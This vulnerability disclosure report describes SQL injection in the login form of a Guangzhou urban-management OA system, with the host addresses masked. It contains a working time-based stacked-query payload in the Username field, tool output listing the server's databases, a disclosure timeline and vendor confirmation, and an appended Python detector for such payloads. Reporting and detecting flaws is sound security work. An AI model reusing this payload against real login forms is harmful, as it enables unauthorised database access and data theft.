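2015-09-02: Details reported to the vendor; awaiting vendor response
2015-09-03: Vendor confirmed; details disclosed to the vendor only
2015-09-13: Details disclosed to core white hats and experts in related fields
2015-09-23: Details disclosed to regular white hats
2015-10-03: Details disclosed to intern white hats
2015-10-18: Details disclosed to the public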
RT
Affected system: Guangzhou Urban Management Network OA office system
http://**.**.**.**/
Vulnerable URL:
POST /Login.aspx HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 277
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=wx33eb45xab13p3zjjbxav55

__VIEWSTATE=dDwtMTc0NDc5MTAyODt0PDtsPGk8MD47PjtsPHQ8O2w8aTwxOT47PjtsPHQ8cDw7cDxsPG9uY2xpY2s7PjtsPFZCU2NyaXB0OkNoZWNrRGF0YSgpOz4%2BPjs7Pjs%2BPjs%2BPjs%2B&ServerAddress=http%3A%2F%2F**.**.**.**%2F&portnum=&UsbKey=&pid=&hideuser=&Username=admin&Password=admin&btnLogin=%B5%C7+%C2%BC
The Username parameter is vulnerable to time-based SQL injection:
---
Parameter: Username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=dDwtMTc0NDc5MTAyODt0PDtsPGk8MD47PjtsPHQ8O2w8aTwxMT47aTwxOT47PjtsPHQ8cDxwPGw8VGV4dDs O2w85Yqg5a G6ZSB6ZSZ6K v77yaOz4 Oz47Oz47dDxwPDtwPGw8b25jbGljazs O2w8VkJTY3JpcHQ6Q2hlY2tEYXRhKCk7Pj4 Ozs Oz4 Oz4 Oz4=&ServerAddress=http://**.**.**.**/&portnum=&UsbKey=&pid=&hideuser=&Username=admin';WAITFOR DELAY '0:0:5'--&Password=admin&btnLogin=%B5%C7 %C2%BC
---
[19:50:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
Databases:
available databases [19]:
[*] cgzhzf_ns
[*] cgzhzf_three
[*] config_db
[*] gzcgzdCARD
[*] gzcgzdQC
[*] JKCWFDB_ARchive_gzj
[*] JKCWFDB_Recycle_gzj
[*] JKCWFDB_SYSTEM_GZJ
[*] JKCWFDB_WORK_GZJ
[*] master
[*] model
[*] monitor_db
[*] msdb
[*] NetGz
[*] Northwind
[*] perf_db
[*] pubs
[*] Temp
[*] tempdb
DBA privileges:
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-09-03 17:42
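Thank you very much for your report. The issue in the report has been confirmed and reproduced. Data affected: high. Attack cost: low. Impact: high. Overall rating: high, rank: 10. We are contacting the organization that manages the site to handle it.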
None at this time.
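A defender-side check for the finding above, as an added example that is not part of the original report or the affected application: it decodes a login POST body shaped like the one in the report and flags stacked-query and time-delay markers in the Username field. The function name, patterns, allow-list and sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Heuristic markers of T-SQL stacked-query / time-delay injection in a field
# that should hold a plain login name (illustrative patterns, an assumption).
SUSPICIOUS = [
    ("stacked_statement", re.compile(r"['\"]\s*;")),
    ("time_delay", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("comment_terminator", re.compile(r"--|/\*")),
]

# Allow-list for login names (an assumption; match it to the real account policy).
USERNAME_OK = re.compile(r"[A-Za-z0-9_.@-]{1,64}")

# Constructed sample bodies modelled on the request in the report.
BENIGN_BODY = ("ServerAddress=http%3A%2F%2Fexample.invalid%2F&portnum=&UsbKey="
               "&Username=admin&Password=admin&btnLogin=%B5%C7+%C2%BC")
ATTACK_BODY = ("ServerAddress=http%3A%2F%2Fexample.invalid%2F&portnum=&UsbKey="
               "&Username=admin%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--"
               "&Password=admin&btnLogin=%B5%C7+%C2%BC")


def inspect_login_body(body, field="Username"):
    """Return a list of finding labels for one urlencoded login POST body."""
    findings = []
    # The form in the report submits GBK-encoded values (btnLogin=%B5%C7+%C2%BC).
    pairs = parse_qsl(body, keep_blank_values=True, encoding="gbk", errors="replace")
    for name, value in pairs:
        if name != field:
            continue
        for label, pattern in SUSPICIOUS:
            if pattern.search(value):
                findings.append(label)
        # Anything outside the allow-list is reported even without a known marker.
        if not USERNAME_OK.fullmatch(value):
            findings.append("fails_allowlist")
    return findings


if __name__ == "__main__":
    for sample in (BENIGN_BODY, ATTACK_BODY):
        print(inspect_login_body(sample))
```

A check like this supplements the actual fix, which is to bind Username as a query parameter on the server rather than concatenating it into SQL.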